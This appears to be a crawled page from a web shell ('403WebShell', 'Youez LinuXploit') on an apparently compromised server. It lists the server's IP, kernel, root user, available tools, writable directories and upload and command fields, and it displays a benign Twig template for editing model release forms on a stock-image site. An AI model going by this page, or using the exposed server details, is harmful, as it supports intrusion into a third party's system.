WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.240
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/sura/templates/release/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/sura/templates/release/edit.html.twig
{#
{% extends 'base.html.twig' %}

{% block title %}Edit Release{% endblock %}

{% block body %}
    <h1>Edit Release</h1>

    {{ include('release/_form.html.twig', {'button_label': 'Update'}) }}

    <a href="{{ path('release_index') }}">back to list</a>

    {{ include('release/_delete_form.html.twig') }}
{% endblock %}
#}


{% extends 'contributor/layout.html.twig' %}

{% block title %}Edit Releasel{% endblock %}


{% block contributor_body %}
    <div class="app_main_inner">
        <div class="page_excerpt">
            <h2 class="sr_heading_title">Edit Model Release</h2>
            <p class="sr_heading_intro">Upload a release to associate with the model</p>
        </div>
        {{ form_start(form) }}
        <div class="row model_release_edit">
            <div class="col-lg-8">
                <div class="card payment_edit">
                    <div class="form_row">
                        <div class="form_col">
                            <div class="form_group">
                                <label class="form_label">Title</label>
                                {{ form_widget(form.title, {'attr': {'placeholder':'Enter release Title'}}) }}
                            </div>
                        </div>

                        <input type="hidden" name = 'filename' value="{{ release.fileName.filename }}">

                        <div class="form_col">
                            <div class="form_group">
                                <label class="form_label">Release Form</label>
                                <a data-fancybox href="{{ asset('/uploads/releases/')}}{{  release.fileName.filename  }}">
                                    {{  release.fileName.filename  }}
                                </a>
                                {{ form_widget(form.fileName, {'attr': {'placeholder':'Update release file','accept': 'image/*, application/pdf'}}) }}

                            </div>
                        </div>

                    </div>

                    <div class="form_row">
                        <div class="form_col">
                            <div class="form_group">
                                <label class="form_label">&nbsp;</label>
                                <input type="submit" value="Save Changes">
                            </div>
                        </div>
                    </div>

                </div>
            </div>
            <div class="col-xl-3">
                <div class="payment_instruction">
                    <h4>What you need to know</h4>
                    <p>For your content to be commercial viable especially content with recognised people or property, it's advisable to attach a signed release form as a proof that they have given consent for the content to be used for commercial use. You can download our release form templates for your use from the
                        <a  class="standard-link" href="{{ path('static_resources',{slug:'release-forms'}) }}">Release Forms</a>  page.</p>
                    <p>To compensate the model or property owner you can either pay them upfront or get into an agreement (contract) that for every sale made, they'll get a percentage. And it's with this reason Sura Images has created a platform where the model/property owner and photographer can collaborate to create content and both will be notified on every activity and sales of each content submitted. </p>
                </div>
            </div>
        </div>
        {{ form_end(form) }}



    </div>
{% endblock %}

Youez - 2016 - github.com/yon3zu
LinuXploit